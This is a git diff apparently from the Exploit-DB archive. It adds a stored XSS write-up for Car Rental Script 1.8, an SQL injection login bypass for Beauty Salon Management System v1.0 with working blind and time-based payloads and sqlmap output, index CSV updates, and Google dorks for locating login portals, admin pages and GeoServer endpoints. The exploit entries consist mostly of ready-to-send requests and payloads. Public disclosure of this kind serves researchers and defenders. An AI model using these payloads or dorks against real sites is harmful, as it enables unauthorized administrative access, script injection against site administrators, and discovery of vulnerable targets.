diff --git a/exploits/php/webapps/51567.txt b/exploits/php/webapps/51567.txt
new file mode 100644
index 000000000..d900619c7
--- /dev/null
+++ b/exploits/php/webapps/51567.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
+# Date: 30/07/2023
+# Exploit Author: CraCkEr
+# Vendor: GZ Scripts
+# Vendor Homepage: https://gzscripts.com/
+# Software Link: https://gzscripts.com/car-rental-php-script.html
+# Version: 1.8
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+Release Notes:
+
+Allow Attacker to inject malicious code into website, give ability to steal sensitive
+information, manipulate data, and launch additional attacks.
+
+## Stored XSS
+-----------------------------------------------
+POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1
+
+payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1
+-----------------------------------------------
+
+POST parameter 'first_name' is vulnerable to XSS
+POST parameter 'second_name' is vulnerable to XSS
+POST parameter 'phone' is vulnerable to XSS
+POST parameter 'address_1' is vulnerable to XSS
+POST parameter 'country' is vulnerable to XSS
+
+
+## Steps to Reproduce:
+
+1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car
+2. Inject your [XSS Payload] in "First Name"
+3. Inject your [XSS Payload] in "Last Name"
+4. Inject your [XSS Payload] in "Phone"
+5. Inject your [XSS Payload] in "Address Line 1"
+6. Inject your [XSS Payload] in "Country"
+7. Accept with terms & Press [Booking]
+XSS Fired on Local User Browser.
+8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
+XSS Will Fire and Executed on his Browser
+9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
+XSS Will Fire and Executed on his Browser
\ No newline at end of file
diff --git a/exploits/php/webapps/51568.txt b/exploits/php/webapps/51568.txt
new file mode 100644
index 000000000..479928796
--- /dev/null
+++ b/exploits/php/webapps/51568.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Beauty Salon Management System v1.0 - SQLi
+# Date of found: 04/07/2023
+# Exploit Author: Fatih Nacar
+# Version: V1.0
+# Tested on: Windows 10
+# Vendor Homepage: https://www.campcodes.com
+# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
+# CWE: CWE-89
+
+Vulnerability Description -
+
+Beauty Salon Management System: V1.0, developed by Campcodes, has been
+found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
+allows an attacker to manipulate login authentication with the SQL queries
+and bypass authentication. The system fails to properly validate
+user-supplied input in the username and password fields during the login
+process, enabling an attacker to inject malicious SQL code. By exploiting
+this vulnerability, an attacker can bypass authentication and gain
+unauthorized access to the system.
+
+Steps to Reproduce -
+
+The following steps outline the exploitation of the SQL Injection
+vulnerability in Beauty Salon Management System V1.0:
+
+1. Open the admin login page by accessing the URL:
+http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php
+
+2. In the username and password fields, insert the following SQL Injection
+payload shown inside brackets to bypass authentication for usename
+parameter:
+
+{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
+ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
+In}
+
+3.Execute the SQL Injection payload.
+
+As a result of successful exploitation, the attacker gains unauthorized
+access to the system and is logged in with administrative privileges.
+
+Sqlmap results:
+
+POST parameter 'username' is vulnerable. Do you want to keep testing the
+others (if any)? [y/N] y
+
+sqlmap identified the following injection point(s) with a total of 793
+HTTP(s) requests:
+
+---
+
+Parameter: username (POST)
+
+Type: boolean-based blind
+
+Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+
+Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
+ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
+In
+
+Type: time-based blind
+
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
+rvYF&password=test&login=Sign In
+
+---
+
+[15:58:56] [INFO] the back-end DBMS is MySQL
+
+web application technology: PHP 8.2.4, Apache 2.4.56
+
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9abcb8f4d..bdcc933bb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -14628,6 +14628,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,1,CVE-2017-17595,"SQL Injection (SQLi)",,,,
49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,,2021-02-19,2021-02-19,0,,,,,,
48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,,2020-06-18,2020-06-18,0,,,,,,
+51568,exploits/php/webapps/51568.txt,"Beauty Salon Management System v1.0 - SQLi",2023-07-04,"Fatih Nacar",webapps,php,,2023-07-04,2023-07-04,0,,,,,,
51098,exploits/php/webapps/51098.txt,"Beauty-salon v1.0 - Remote Code Execution (RCE)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,webapps,php,,2008-02-20,,1,OSVDB-42010;CVE-2008-0921,,,,,
17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php,,2011-04-16,2011-04-16,1,,,,,,
@@ -15119,7 +15120,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43825,exploits/php/webapps/43825.txt,"Burning Board < 2.3.1 - SQL Injection",2015-05-16,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00069;CVE-2005-1642,,,,,http://gulftech.org/advisories/Burning%20Board%20SQL%20Injection/69
12485,exploits/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,webapps,php,,2010-05-01,,0,,,,,,
43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,,2017-12-14,2017-12-14,1,CVE-2017-17645,,,,,
-51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
+51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-07-04,1,,,,,,
50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2021-09-09,0,,,,,,
50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
@@ -15301,6 +15302,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,,2020-11-10,2020-11-10,0,,,,,,
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,,2020-12-02,2020-12-02,0,,,,,,
49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,,2021-02-03,2021-02-03,0,,,,,,
+51567,exploits/php/webapps/51567.txt,"Car Rental Script 1.8 - Stored Cross-site scripting (XSS)",2023-07-04,CraCkEr,webapps,php,,2023-07-04,2023-07-04,0,,,,,,
43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17637,,,,,
41595,exploits/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",webapps,php,,2017-03-13,2017-03-13,0,,,,,,
26878,exploits/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4381;OSVDB-21834,,,,,https://www.securityfocus.com/bid/15939/info
@@ -24310,7 +24312,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",webapps,php,,2006-09-26,,1,OSVDB-37965;CVE-2006-5102,,,,,
24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,,2004-09-01,2013-01-27,1,CVE-2004-1657;OSVDB-9453,,,,,https://www.securityfocus.com/bid/11086/info
2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,webapps,php,,2006-12-20,,1,OSVDB-32400;CVE-2006-6711,,,,,
-51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-06-26,0,CVE-2022-3142,,,,,
+51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-07-04,1,CVE-2022-3142,,,,,
28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,webapps,php,,2006-09-13,2013-09-28,1,,,,,,https://www.securityfocus.com/bid/20040/info
27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,webapps,php,,2006-04-25,2013-08-21,1,CVE-2006-2051;OSVDB-25265,,,,,https://www.securityfocus.com/bid/17685/info
37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,webapps,php,,2012-03-27,2015-05-14,1,OSVDB-80637;CVE-2012-1603,,,,,https://www.securityfocus.com/bid/52728/info
diff --git a/ghdb.xml b/ghdb.xml
index c2fc77d8f..d57eb8014 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -37217,6 +37217,37 @@ Google+ https://plus.google.com/u/0/114827336297709201563
2021-09-27
Bon Sai
+
+ 8210
+ https://www.exploit-db.com/ghdb/8210
+ Files Containing Juicy Info
+ Google dorks
+ # Google Dork: intext:"/login.php" intitle:"login"
+# Files Containing Juicy Info
+# Date: 04/06/2023
+# Exploit Author: Avadhesh Nishad
+
+
+
+
+
+Avadhesh Nishad
+
+( WEB APPLICATION SECURITY RESEARCHERS )
+
+
+*POC Images Attached with this mail.*
+
+
+[image: Screenshot (4).png]
+[image: Screenshot (5).png]
+
+ Google dorks
+ https://www.google.com/search?q=Google dorks
+
+ 2023-07-04
+ Avadhesh Nishad
+
7836
https://www.exploit-db.com/ghdb/7836
@@ -90751,6 +90782,21 @@ site:".atlassian.net" / "service desk/customer/user/login"2021-09-14
Madan Kumawat
+
+ 8215
+ https://www.exploit-db.com/ghdb/8215
+ Pages Containing Login Portals
+ site:.com inurl:/login.aspx
+ # Google Dork: site:.com inurl:/login.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta
+ site:.com inurl:/login.aspx
+ https://www.google.com/search?q=site:.com inurl:/login.aspx
+
+ 2023-07-04
+ Sachin Gupta
+
7704
https://www.exploit-db.com/ghdb/7704
@@ -90843,6 +90889,36 @@ Zeel Chavda
2015-07-27
anonymous
+
+ 8213
+ https://www.exploit-db.com/ghdb/8213
+ Pages Containing Login Portals
+ site:.org inurl:/admin.aspx
+ # Google Dork: site:.org inurl:/admin.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta
+ site:.org inurl:/admin.aspx
+ https://www.google.com/search?q=site:.org inurl:/admin.aspx
+
+ 2023-07-04
+ Sachin Gupta
+
+
+ 8214
+ https://www.exploit-db.com/ghdb/8214
+ Pages Containing Login Portals
+ site:.org inurl:/login.aspx
+ # Google Dork: site:.org inurl:/login.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta
+ site:.org inurl:/login.aspx
+ https://www.google.com/search?q=site:.org inurl:/login.aspx
+
+ 2023-07-04
+ Sachin Gupta
+
5368
https://www.exploit-db.com/ghdb/5368
@@ -91112,6 +91188,36 @@ Iranian cyber sec researcher
2020-12-01
Reza Abasi
+
+ 8212
+ https://www.exploit-db.com/ghdb/8212
+ Pages Containing Login Portals
+ site:co.in inurl:/admin.aspx
+ # Google Dork: site:co.in inurl:/admin.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta
+ site:co.in inurl:/admin.aspx
+ https://www.google.com/search?q=site:co.in inurl:/admin.aspx
+
+ 2023-07-04
+ Sachin Gupta
+
+
+ 8211
+ https://www.exploit-db.com/ghdb/8211
+ Pages Containing Login Portals
+ site:co.in inurl:/login.aspx
+ # Google Dork: site:co.in inurl:/login.aspx
+# Pages Containing Login Portals
+# Date: 04/07/2023
+# Exploit Author: Sachin Gupta
+ site:co.in inurl:/login.aspx
+ https://www.google.com/search?q=site:co.in inurl:/login.aspx
+
+ 2023-07-04
+ Sachin Gupta
+
6444
https://www.exploit-db.com/ghdb/6444
@@ -114202,6 +114308,21 @@ https://www.exploit-db.com/exploits/50021
2021-06-25
Alexandros Pappas
+
+ 8216
+ https://www.exploit-db.com/ghdb/8216
+ Vulnerable Servers
+ inurl:"/geoserver/ows?service=wfs"
+ # Google Dork: inurl:"/geoserver/ows?service=wfs"
+# Vulnerable Servers
+# Date: 04/07/2023
+# Author: Bipin Jitiya
+ inurl:"/geoserver/ows?service=wfs"
+ https://www.google.com/search?q=inurl:"/geoserver/ows?service=wfs"
+
+ 2023-07-04
+ Bipin Jitiya
+
833
https://www.exploit-db.com/ghdb/833